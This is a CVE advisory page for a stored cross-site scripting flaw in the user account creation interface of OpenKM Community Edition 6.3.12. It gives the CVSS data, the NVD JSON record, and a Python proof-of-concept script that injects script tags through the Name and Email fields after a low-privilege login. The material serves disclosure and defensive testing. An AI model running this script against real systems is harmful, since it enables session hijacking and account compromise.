Security Vulnerability Report
CVE-2025-57244 CVSS 5.4 MEDIUM

CVE-2025-57244

Published: 2025-11-05 17:15:45
Last Modified: 2025-11-07 19:48:25

Description

OpenKM Community Edition 6.3.12 is vulnerable to stored cross-site scripting (XSS) in the user account creation interface. The Name field accepts script tags, and the Email field is vulnerable when the POST request is modified to include encoded script tags, bypassing frontend validation.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openkm:openkm:6.3.12:*:*:*:community:*:*:* - VULNERABLE
OpenKM Community Edition 6.3.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-57244 OpenKM Stored XSS PoC
# Affected: OpenKM Community Edition 6.3.12
import requests
import urllib.parse

target_url = "http://target-ip:8080/OpenKM"
login_url = f"{target_url}/j_spring_security_check"
create_user_url = f"{target_url}/admin/user"

session = requests.Session()

# Step 1: Login with low privilege account
login_data = {
    "j_username": "attacker",
    "j_password": "password"
}
session.post(login_url, data=login_data)

# Step 2: Method 1 - XSS via Name field
xss_payload_name = "<script>alert(document.cookie)</script>"
user_data_name = {
    "usr_id": "testuser1",
    "usr_name": xss_payload_name,
    "usr_email": "[email protected]",
    "usr_password": "Test123456",
    "usr_active": "true"
}
session.post(create_user_url, data=user_data_name)

# Step 3: Method 2 - XSS via Email field (bypass frontend validation)
xss_payload_email_encoded = urllib.parse.quote("<script>alert('XSS')</script>")
user_data_email = {
    "usr_id": "testuser2",
    "usr_name": "Test User",
    "usr_email": f"test{xss_payload_email_encoded}@example.com",
    "usr_password": "Test123456",
    "usr_active": "true"
}
session.post(create_user_url, data=user_data_email)

print("PoC executed. Check if XSS is triggered when viewing user accounts.")
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57244", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:44.543", "lastModified": "2025-11-07T19:48:25.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenKM Community Edition 6.3.12 is vulnerable to stored cross-site scripting (XSS) in the user account creation interface. The Name field accepts script tags and the Email field is vulnerable when the POST request is modified to include encoded script tags, by passing frontend validation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openkm:openkm:6.3.12:*:*:*:community:*:*:*", "matchCriteriaId": "C1E76DAF-D676-4056-89B9-E8AFF46450E6"}]}]}], "references": [{"url": "https://github.com/wolffangsecurity/CVEs/blob/main/Stored%20XSS%20via%20Input%20Fields%20with%20Inconsistent%20Client-Side%20and%20Server-Side%20Validation%20Writeup.md", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/wolffangsecurity/CVEs/tree/main/CVE-2025-57244", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}